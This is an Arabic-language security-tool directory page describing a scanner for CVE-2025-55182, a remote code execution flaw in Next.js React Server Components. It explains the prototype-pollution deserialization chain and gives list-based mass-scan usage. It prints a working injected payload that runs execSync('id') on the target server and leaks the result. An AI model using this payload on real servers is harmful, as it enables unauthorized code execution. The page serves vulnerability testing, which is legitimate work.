Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Scanner — ماسح أمني لـ CVE-2025-55182 - ثغرة RCE خطيرة في React Server Components | Kitploit
أدوات/GitHubGitHub/f0xyx/cve-2025-55182-scanner
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubf0xyx/cve-2025-55182-scanner

CVE-2025-55182-Scanner

ماسح أمني لـ CVE-2025-55182 - ثغرة RCE خطيرة في React Server Components

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE‑2025‑55182 – ماسح ثغرة RCE عبر إلغاء تسلسل RSC في Next.js

تتحقق هذه الأداة مما إذا كان الهدف معرضًا لثغرة CVE‑2025‑55182، وهي خلل تنفيذ أوامر عن بعد (RCE) ناتج عن معالجة غير آمنة لحمولات نموذج RSC (مكونات خادم React) داخل Next.js.
تسلسل الثغرة هو Prototype Pollution → Deserialization Abuse → Server‑Side JavaScript Execution.

تنويه: استخدم هذه الأداة فقط على أنظمة تمتلكها قانونيًا أو لديك إذن صريح لاختبارها. الاختبار دون إذن = جريمة، يا صديقي.


🔥 كيف تعمل هذه الثغرة

يقوم Next.js داخليًا بمعالجة كائنات “نموذج” خاصة تُرسل عبر multipart/form-data.
إذا قام المهاجم بحقن بنية خبيثة مثل thenable مزور، يمكنه تسميم:

  • __proto__
  • _response._prefix
  • constructor.constructor
  • وغيرها من العناصر الداخلية

يؤدي ذلك إلى قيام الخادم بتقييم JavaScript يتحكم به المهاجم، مما ينتج عنه RCE كامل.


📌 ما يفعله هذا السكريبت

  • يقبل رابطًا واحدًا (-u) أو قائمة بالأهداف (-l)
  • يرسل حمولة مصممة لإلغاء التسلسل عبر multipart
  • يستخرج مخرجات الأمر (id) من digest خطأ الخادم
  • يحفظ المضيفين المعرضين في foxvuln.txt

▶ الاستخدام

رابط واحد

root@kitploit:~
python3 main.py -u https://target.com

وضع القائمة

root@kitploit:~
python3 main.py -l list.txt

📦 نظرة عامة على الحمولة

تستغل الحمولة process.mainModule.require('child_process').execSync() من خلال _prefix المحقون:

root@kitploit:~
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",

يؤدي ذلك إلى إجبار الخادم على تنفيذ id وتسريب النتيجة داخل digest المرمي (لأن أخطاء RSC ترجع عمدًا حقل digest منظم).


🧪 مثال للإخراج

هدف معرض:

root@kitploit:~
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)

غير معرض:

root@kitploit:~
[+] Testing: https://secure.com
[NOT VULN]

🗂 ملف الإخراج

يتم حفظ جميع عناوين URL المؤكدة على أنها معرضة في:

root@kitploit:~
foxvuln.txt

التنسيق:

root@kitploit:~
https://victim.com => uid=1000(www-data)

🧠 ملاحظات

  • تعمل فقط على نقاط النهاية التي تعالج حمولات تدفق RSC لـ Next.js
  • لا تقوم بتجربة المسارات — تفترض أن المضيف يعالج POST في /
  • المهلة الزمنية محددة بـ 10 ثوانٍ لكل مضيف
  • آمنة تمامًا في البيئات المختبرية — لكن لا تشغلها على خوادم عشوائية ما لم تكن ترغب في ارتكاب جناية بسرعة
تنزيل الأداة